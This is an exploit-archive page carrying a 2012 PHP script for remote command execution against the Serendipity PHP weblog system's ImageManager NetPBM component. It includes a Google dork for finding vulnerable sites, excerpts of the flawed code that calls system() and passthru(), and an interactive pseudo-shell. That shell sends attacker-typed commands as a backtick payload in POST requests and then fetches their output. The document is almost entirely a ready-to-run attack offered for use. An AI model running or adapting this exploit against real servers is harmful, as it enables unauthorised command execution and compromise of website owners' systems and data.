Serendipity PHP Weblog System Remote Command Execution



EKU-ID: 1784 CVE: OSVDB-ID:
Author: L3b-r1'z Published: 2012-03-28 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


<?
/*
# Exploit Title: Serendipity PHP Weblog System Remote Command Execution
# Date: 27/mar/2012
# Author: L3b-r1'z
# Vendor or Software Link: http://sourceforge.net/projects/php-blog/files/latest/download?source=directory
# Version: 1.0
# Category: webapps
# Google dork: allintext: "Powered by Serendipity"
# Tested on: linux \ bt
# Security: RISK
# Greet'z : Mad Hacker'z , Sec4ever , Sec4leb (Sec4leb.com) , I-Hmx , Mr.Black , Lito , Mr.XKILler , Mr.Ps , The Injector , Ked-Ans , Unk Hacker , Inj3ct0r Team , And All My Friends :D

Vuln Code in : \serendipity\htmlarea\plugins\ImageManager\Classes\NetPBM.php

    function save($filename, $type=null, $quality = 85)
    {
        $cmd = $this->_postProcess('', $quality, $type) . ">$filename";
          
        //if we have windows server
        if(isset($_ENV['OS']) && eregi('window',$_ENV['OS']))
            $cmd = ereg_replace('/','\\',$cmd);
        //echo $cmd."##";
        $output = system($cmd);
        error_log('NETPBM: '.$cmd);
        //error_log($output);
        $this->command = array();
    } // End save


    /**
     * Display image without saving and lose changes
     *
     * @param string $type (jpeg,png...);
     * @param int $quality 75
     * @return none
     */
    function display($type = null, $quality = 75)
    {
        header('Content-type: image/' . $type);
        $cmd = $this->_postProcess($type, $quality);
      
        passthru($cmd);
        $this->command = array();
    }


*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n");
    fputs($sock, $packet);
    return stream_get_contents($sock);
}
print "\n+-----------------------------------------------------------------------------------------------------------------------+";
print "\n| Serendipity PHP Weblog System Remote Command Execution Exploit by L3b-r1'z |";
print "\n+-----------------------------------------------------------------------------------------------------------------------+\n";
if ($argc < 3)
{
    print "\nUsage......: php $argv[0] <host> <path>\n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /Serendipity/\n";
    die();
}

list($host, $path) = array($argv[1], $argv[2]);

$r_pack  = "GET {$path}htmlarea/plugins/ImageManager/Classes/ HTTP/1.0\r\n";
$r_pack .= "Host: {$host}\r\n";
$r_pack .= "Connection: close\r\n\r\n";

$packet  = "POST {$path}NetPBM.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: %d\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "X_REQUESTED_WITH: XMLHttpRequest\r\n";
$packet .= "Connection: close\r\n\r\n%s";

while(1)
{
    print "\nL3br1z-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    else if (preg_match('/\./', $cmd)) print "\nDots not allowed!\n";
    else if (preg_match('/\)/', $cmd)) print "\nParenthesis not allowed!\n";
    else
    {
        $payload = "cmd=.(`{$cmd}>cmd`).";
        http_send($host, sprintf($packet, strlen($payload), $payload));
        $output = http_send($host, $r_pack);
        !preg_match('/404 not/i', $output) && preg_match('/\n\r\n(.*)/s', $output, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
    }
}
?>